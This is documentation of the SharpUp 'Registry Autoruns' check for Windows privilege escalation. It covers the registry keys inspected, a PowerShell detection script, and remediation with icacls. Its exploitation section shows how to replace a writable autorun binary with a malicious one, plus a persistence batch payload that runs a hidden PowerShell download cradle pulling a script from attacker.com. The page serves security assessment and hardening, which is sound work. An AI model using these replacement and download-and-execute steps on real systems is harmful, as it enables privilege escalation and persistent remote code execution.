
Overview

The Registry Autoruns check identifies registry entries that automatically execute programs at system startup or user logon, where the executable files have weak permissions. This allows an attacker to replace legitimate autorun binaries with malicious ones for privilege escalation or persistence.

How It Works

SharpUp checks multiple autorun registry locations.

HKLM Locations:
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
  • SOFTWARE\Microsoft\Windows\CurrentVersion\RunService
  • SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceService
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunService
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceService
For each entry:
  1. Extracts the executable path using regex
  2. Checks if the current user can modify the executable
  3. Reports modifiable autorun binaries
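The three steps above, reproduced in PowerShell as an added example (this is not SharpUp's code; the function names Get-AutorunTarget and Test-CurrentUserCanModify are hypothetical). It assumes it runs as the account being assessed, reads the four HKLM Run/RunOnce keys listed above, and does not evaluate Deny ACEs, so a hit is a candidate to confirm rather than a proof.

```powershell
# Added example (not SharpUp's code): the HKLM part of the check described above, in PowerShell.
# Assumption: run as the account being assessed; Deny ACEs are not evaluated.

# Step 1: pull the executable path out of a raw autorun value. Handles both
#   "C:\Program Files\App\app.exe" /silent   and   C:\Program Files\App\app.exe /silent
function Get-AutorunTarget {
    param([string]$Value)
    if ($Value -match '^\s*"([^"]+)"') { return $matches[1] }                          # quoted path
    if ($Value -match '^\s*(.+?\.(exe|bat|cmd|ps1))(\s|$)') { return $matches[1] }     # unquoted, stops at first extension
    return $null
}

# Step 2: does the current user, directly or via group membership, hold rights that let it
# rewrite or replace the file? WriteData=0x2, Delete=0x10000, ChangePermissions=0x40000, TakeOwnership=0x80000
function Test-CurrentUserCanModify {
    param([string]$Path)
    $writeMask = 0x2 -bor 0x10000 -bor 0x40000 -bor 0x80000
    $me   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }                                                              # unresolvable principal
        if ($sids -contains $sid -and (([int]$ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

# Step 3: walk the HKLM keys and report modifiable targets in the same shape as SharpUp's output.
$hklmKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $hklmKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($prop in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($prop.Name -match '^PS') { continue }                                      # PSPath/PSParentPath/... metadata
        $target = Get-AutorunTarget -Value ([string]$prop.Value)
        if ($target -and (Test-Path -LiteralPath $target) -and (Test-CurrentUserCanModify -Path $target)) {
            "$key : $target"
        }
    }
}
```

Run it as a standard user to see what SharpUp would report for that account; a hit means a broad or user-specific Allow ACE grants write, delete or ownership rights on the binary.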

Example Output

=== Modifiable Registry AutoRun Files ===
    HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run : C:\Tools\startup.exe
    HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run : C:\Apps\monitor.bat

Exploitation

Method 1: Replace Autorun Binary

# Backup original
$autorunPath = "C:\Tools\startup.exe"
Copy-Item $autorunPath "$autorunPath.bak"

# Replace with malicious binary
Copy-Item C:\temp\malicious.exe $autorunPath -Force

# Wait for system restart or user logon
# Malicious code executes automatically

Method 2: Persistence

# Create backdoor that runs at every logon
$payload = @"
@echo off
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
"@

$payload | Out-File -FilePath "C:\Tools\startup.bat" -Encoding ASCII

# Executes every time any user logs on

Remediation

Step 1: Identify Modifiable Autoruns

$runKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run"
)

# Broad principals that should never hold write rights on an autorun binary
$broadPrincipals = 'Everyone|BUILTIN\\Users|Authenticated Users|INTERACTIVE'
# Rights that let a principal rewrite or replace the file (WriteData = 0x2, Delete = 0x10000)
$writeMask = 0x10002

foreach ($key in $runKeys) {
    $props = Get-ItemProperty $key
    $props | Get-Member -MemberType NoteProperty |
    Where-Object { $_.Name -notmatch '^PS' } | ForEach-Object {   # skip PSPath/PSParentPath/... metadata
        $name  = $_.Name
        $value = $props.$name

        if ($value -match '(.+\.exe|.+\.bat|.+\.ps1)') {
            $exePath = $matches[1].Trim('"')
            if (Test-Path $exePath) {
                $acl  = Get-Acl $exePath
                # An Allow ACE giving a broad principal write or delete rights makes the entry modifiable
                $weak = $acl.Access | Where-Object {
                    $_.AccessControlType -eq 'Allow' -and
                    $_.IdentityReference.Value -match $broadPrincipals -and
                    (([int]$_.FileSystemRights -band $writeMask) -ne 0)
                }
                if ($weak) {
                    Write-Host "MODIFIABLE: $name -> $exePath"
                    $weak | ForEach-Object { Write-Host "    $($_.IdentityReference): $($_.FileSystemRights)" }
                } else {
                    Write-Host "OK: $name -> $exePath"
                }
            }
        }
    }
}

Step 2: Secure Autorun Binaries

# Fix permissions on autorun executable: drop inherited ACEs, give only
# SYSTEM and Administrators full control, and leave standard users read/execute
$exePath = "C:\Tools\startup.exe"

icacls $exePath /reset            # restore the inherited defaults first
icacls $exePath /inheritance:r    # remove inherited ACEs so the grants below form the whole DACL
icacls $exePath /grant:r "SYSTEM:F"
icacls $exePath /grant:r "Administrators:F"
icacls $exePath /grant:r "Users:RX"
# Verify the result with: icacls $exePath

Step 3: Remove Unnecessary Autoruns

# Review and remove unnecessary autorun entries
$key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Remove-ItemProperty -Path $key -Name "UnnecessaryApp"